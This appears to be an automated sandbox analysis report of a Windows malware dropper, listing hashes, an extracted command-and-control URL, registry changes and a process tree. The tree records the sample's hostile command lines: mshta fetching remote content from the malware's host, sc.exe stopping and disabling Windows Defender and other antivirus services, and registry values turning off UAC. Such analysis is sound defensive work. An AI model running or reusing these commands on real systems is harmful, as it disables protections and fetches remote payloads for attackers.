Analysis
max time kernel: 150s
max time network: 140s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31/10/2024, 05:06

Static task: static1

Behavioral task: behavioral1
  Sample: 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
  Resource: win7-20241010-en

Behavioral task: behavioral2
  Sample: 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
  Resource: win10v2004-20241007-en
General
Target: 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
Size: 2.0MB
MD5: 81bc906307d99bcb8b3aeaceb1d51b5c
SHA1: 9dfd66539c689b2ecaf46fdcdeebf00128e59f87
SHA256: 191f71d0ce6906e90271c1a713d6420759744e21455818a244f4331f38e16b08
SHA512: 2d1912e20c73da05e6e5ff9373620ce829647fe23c92e54b20cac74453967831b89c9b00451938fbc3b9497f16b716e756f63540929b342de4d8cec05e5eb3f5
SSDEEP: 49152:r5cOFNA7o0BM4wpDnqrYTHJ0I24oS6HGpwlSGnf:r5vNOoLpVuI21S6HGuR
Malware Config
Extracted
http://galaint.onlinesecstats.info/?0=155&1=1&2=1&3=54&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=tmikvgppmh&14=1
Signatures
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Protector-cphn.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | Protector-cphn.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | Protector-cphn.exe
Disables taskbar notifications via registry modification
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | dvj45s81vl7c89u.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | 56m04a7z799e88f.exe
Executes dropped EXE 3 IoCs
pid | Process
4492 | dvj45s81vl7c89u.exe
3764 | 56m04a7z799e88f.exe
2776 | Protector-cphn.exe
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-cphn.exe" | Protector-cphn.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Protector-cphn.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
Drops file in System32 directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\services.msc | Protector-cphn.exe
File opened for modification | C:\Windows\SysWOW64\eventvwr.msc | Protector-cphn.exe
File opened for modification | C:\Windows\SysWOW64\diskmgmt.msc | Protector-cphn.exe
Launches sc.exe 8 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
1476 | sc.exe
1528 | sc.exe
4080 | sc.exe
780 | sc.exe
2900 | sc.exe
3564 | sc.exe
2268 | sc.exe
1464 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Protector-cphn.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 56m04a7z799e88f.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | dvj45s81vl7c89u.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | IEXPLORE.EXE
Modifies registry class 35 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3764 | 56m04a7z799e88f.exe
Token: SeShutdownPrivilege | 3764 | 56m04a7z799e88f.exe
Token: SeDebugPrivilege | 2776 | Protector-cphn.exe
Token: SeShutdownPrivilege | 2776 | Protector-cphn.exe
Suspicious use of FindShellTrayWindow 5 IoCs
pid | Process
2776 | Protector-cphn.exe
2776 | Protector-cphn.exe
2776 | Protector-cphn.exe
2776 | Protector-cphn.exe
4884 | iexplore.exe
Suspicious use of SendNotifyMessage 4 IoCs
pid | Process
2776 | Protector-cphn.exe
2776 | Protector-cphn.exe
2776 | Protector-cphn.exe
2776 | Protector-cphn.exe
Suspicious use of SetWindowsHookEx 12 IoCs
pid | Process
3764 | 56m04a7z799e88f.exe
2776 | Protector-cphn.exe
2776 | Protector-cphn.exe
2776 | Protector-cphn.exe
2776 | Protector-cphn.exe
2776 | Protector-cphn.exe
4884 | iexplore.exe
4884 | iexplore.exe
3640 | IEXPLORE.EXE
3640 | IEXPLORE.EXE
3640 | IEXPLORE.EXE
3640 | IEXPLORE.EXE
Suspicious use of WriteProcessMemory 44 IoCs
System policy modification 1 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Protector-cphn.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Protector-cphn.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | Protector-cphn.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | Protector-cphn.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe"
Depth: 1
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4916
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe" -e -p7k3y195xurds9tc
Depth: 2
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4492
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe"
Depth: 3
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3764
-
C:\Users\Admin\AppData\Roaming\Protector-cphn.exe
Command line: C:\Users\Admin\AppData\Roaming\Protector-cphn.exe
Depth: 4
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2776
-
C:\Windows\SysWOW64\mshta.exe
Command line: mshta.exe "http://galaint.onlinesecstats.info/?0=155&1=1&2=1&3=54&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=tmikvgppmh&14=1"
Depth: 5
- System Location Discovery: System Language Discovery
PID:456
-
C:\Windows\SysWOW64\sc.exe
Command line: sc stop WinDefend
Depth: 5
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1476
-
C:\Windows\SysWOW64\sc.exe
Command line: sc config WinDefend start= disabled
Depth: 5
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2268
-
C:\Windows\SysWOW64\sc.exe
Command line: sc stop msmpsvc
Depth: 5
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3564
-
C:\Windows\SysWOW64\sc.exe
Command line: sc config msmpsvc start= disabled
Depth: 5
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2900
-
C:\Windows\SysWOW64\sc.exe
Command line: sc config ekrn start= disabled
Depth: 5
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:780
-
C:\Windows\SysWOW64\sc.exe
Command line: sc stop AntiVirService
Depth: 5
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4080
-
C:\Windows\SysWOW64\sc.exe
Command line: sc config AntiVirService start= disabled
Depth: 5
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1528
-
C:\Windows\SysWOW64\sc.exe
Command line: sc config AntiVirSchedulerService start= disabled
Depth: 5
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1464
-
C:\Program Files\Internet Explorer\iexplore.exe
Command line: "C:\Program Files\Internet Explorer\iexplore.exe" res://ieframe.dll/dnserrordiagoff.htm#http://www.cmyip.com/
Depth: 5
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4884
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4884 CREDAT:17410 /prefetch:2
Depth: 6
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3640
-
C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\56M04A~1.EXE" >> NUL
Depth: 4
- System Location Discovery: System Language Discovery
PID:1988
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Image File Execution Options Injection (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Image File Execution Options Injection (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (1)
- Indicator Removal (1)
  - File Deletion (1)
- Modify Registry (4)
Downloads